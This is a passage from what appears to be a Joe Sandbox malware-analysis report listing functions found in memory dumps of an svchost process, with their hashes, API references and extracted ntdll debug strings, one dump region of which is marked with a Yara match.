                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                                        • Instruction ID: 3e4c8020fde09d5cc82a71ec5c72973cdace0c340d5d54fa26a49ab43bab68fd
                                                                        • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                                        • Instruction Fuzzy Hash: 1B514671E00606DFCB18CF68C4916AAFBF1FF58314B18816ED819AB745E734EA80CB94
                                                                        Function 03472890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                        • API String ID: 48624451-2108815105
                                                                        • Opcode ID: dfb2ab201aba613860b8ddaddb2c2ce2a578490b72da1ce0d487f64dedbc36d7
                                                                        • Instruction ID: 3849aca05d3806e097de92d7cbcdbed50a850603cac0f28d50e16cbdd20129d1
                                                                        • Opcode Fuzzy Hash: dfb2ab201aba613860b8ddaddb2c2ce2a578490b72da1ce0d487f64dedbc36d7
                                                                        • Instruction Fuzzy Hash: 9451D5B5B00516BFCB10DB9888909BFF7B8BB49200758866BE4A5DF641D274DE40CBA8
                                                                        Function 03467630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 034A4725
                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 034A4655
                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 034A4742
                                                                        • ExecuteOptions, xrefs: 034A46A0
                                                                        • Execute=1, xrefs: 034A4713
                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 034A46FC
                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 034A4787
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                        • API String ID: 0-484625025
                                                                        • Opcode ID: 6155378a286dc3fc4561b155d6678c8ba13fa7811350f1e1be1f24cac9b4c065
                                                                        • Instruction ID: 6633c514fc4ea3ec2782d37d2437d68f5bea1f8772490947faf64e61b3f56107
                                                                        • Opcode Fuzzy Hash: 6155378a286dc3fc4561b155d6678c8ba13fa7811350f1e1be1f24cac9b4c065
                                                                        • Instruction Fuzzy Hash: F5513B756003096EDB20EFA9DC85FEE7BB8AF14314F1400ABD505AF390E771AA458B59
                                                                        Function 0347B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: __aulldvrm
                                                                        • String ID: +$-$0$0
                                                                        • API String ID: 1302938615-699404926
                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                        • Instruction ID: 190be8e3f855835c29307f5b229531a12148b597511bb2a7c84519a7f6e38254
                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                        • Instruction Fuzzy Hash: 6E81BF74E052499EDF24CE68C8917FEBBB6EF45320F1C425BD861AF390C73498418B69
                                                                        Function 0345F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 034A02E7
                                                                        • RTL: Re-Waiting, xrefs: 034A031E
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 034A02BD
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                        • API String ID: 0-2474120054
                                                                        • Opcode ID: 38d9de2bd5d68b9d22f3905dcbaf2d0b2a99242a0acd0263f59817186a547686
                                                                        • Instruction ID: 500a430ecd6e8a603e56fcd3d3d0ca1709eda35d9053f14df8333e05cd389bdd
                                                                        • Opcode Fuzzy Hash: 38d9de2bd5d68b9d22f3905dcbaf2d0b2a99242a0acd0263f59817186a547686
                                                                        • Instruction Fuzzy Hash: D8E18C31A04B41DFD724CF28C884B6AB7E4BB44314F180A5EF9A58F3A1D775D949CB4A
                                                                        Function 0346BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • RTL: Re-Waiting, xrefs: 034A7BAC
                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 034A7B7F
                                                                        • RTL: Resource at %p, xrefs: 034A7B8E
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                        • API String ID: 0-871070163
                                                                        • Opcode ID: c813fac53e79939e7bb44130736654a8397e5e0490ac7cfa967e43b15b27aa1f
                                                                        • Instruction ID: 744f114dd1256efbd74b17aaf5c9c18e0a9d0bafc8693eca25f5ba6320665f04
                                                                        • Opcode Fuzzy Hash: c813fac53e79939e7bb44130736654a8397e5e0490ac7cfa967e43b15b27aa1f
                                                                        • Instruction Fuzzy Hash: 7D41E5353007029FC728DE2ACC40B6BB7E9EB98710F14091EE956DF790D731E4058B9A
                                                                        Function 0346B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 034A728C
                                                                        Strings
                                                                        • RTL: Re-Waiting, xrefs: 034A72C1
                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 034A7294
                                                                        • RTL: Resource at %p, xrefs: 034A72A3
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                        • API String ID: 885266447-605551621
                                                                        • Opcode ID: 97fbdf91e9992b2d152f3593f8fa0b2421b6c8445247565f1ec57a1f7e57c24c
                                                                        • Instruction ID: 86e0366dad6b11ba8a6465968d3d7410d6f35a5f7bbe669803305ce7843c7ec0
                                                                        • Opcode Fuzzy Hash: 97fbdf91e9992b2d152f3593f8fa0b2421b6c8445247565f1ec57a1f7e57c24c
                                                                        • Instruction Fuzzy Hash: 3D41E136700A06AFC720DE6ACC41B6ABBA5FB94714F14462BF855DF380DB21F81687D9
                                                                        Function 03477D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: __aulldvrm
                                                                        • String ID: +$-
                                                                        • API String ID: 1302938615-2137968064
                                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                        • Instruction ID: 3797f2461f9603d70e8fd521aef8a8712ad08115261ae9cbbc3048cfe937b5e3
                                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                        • Instruction Fuzzy Hash: 9B918170E002169EDB24DF69C981AFFBBA5AF44720F98451BE865EF3D0D73099428B58
                                                                        Function 03439126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $$@
                                                                        • API String ID: 0-1194432280
                                                                        • Opcode ID: 3d3a6df4a55a9d22efad0b02051240eda7e941a3c43e449110ee5704ea889b29
                                                                        • Instruction ID: ab6d1f0bf04d725aa5249a3fc28d94c7fe4129c2b41d4a5fb15b4e3b71714d27
                                                                        • Opcode Fuzzy Hash: 3d3a6df4a55a9d22efad0b02051240eda7e941a3c43e449110ee5704ea889b29
                                                                        • Instruction Fuzzy Hash: D5814B76D002699BEB31CF54CC44BEEB6B4AB09710F0445EBE919BB290D7709E85CFA4
                                                                        Function 034BCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 034BCFBD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: CallFilterFunc@8
                                                                        • String ID: @$@4Cw@4Cw
                                                                        • API String ID: 4062629308-3101775584
                                                                        • Opcode ID: 2a30a1edc8bfe871ecaba4ab18783712042292f0be744d4f4a67eccdf261066a
                                                                        • Instruction ID: d8673e1b50d7549f4fd3a54e175278ac9f8885952cd28c1a89e94d069ad56271
                                                                        • Opcode Fuzzy Hash: 2a30a1edc8bfe871ecaba4ab18783712042292f0be744d4f4a67eccdf261066a
                                                                        • Instruction Fuzzy Hash: 93418E79A00224DFDB21DF99D880AAEBBB8FF46B04F04446BE914DF264D774D801CB69
                                                                        Function 031021EE Relevance: 5.2, Strings: 4, Instructions: 182COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750254248.0000000003100000.00000004.00000020.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750333765.0000000003200000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750377511.0000000003250000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750429967.00000000032A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750475286.0000000003350000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3100000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Inst$Null$soft$vy
                                                                        • API String ID: 0-1924780883
                                                                        • Opcode ID: 02d86b5b1373c700681cc002a9141567cb2ed731372a064938ce2e39d3abefd5
                                                                        • Instruction ID: c066463629a153f71c1fb99ebf4b9bf02e9b4a9cf6988dda996910655b34910a
                                                                        • Opcode Fuzzy Hash: 02d86b5b1373c700681cc002a9141567cb2ed731372a064938ce2e39d3abefd5
                                                                        • Instruction Fuzzy Hash: 0B51E575901308ABDB10DF75DD89B9D7BA8FB0D354F248826E904BB2D0DBF489428B65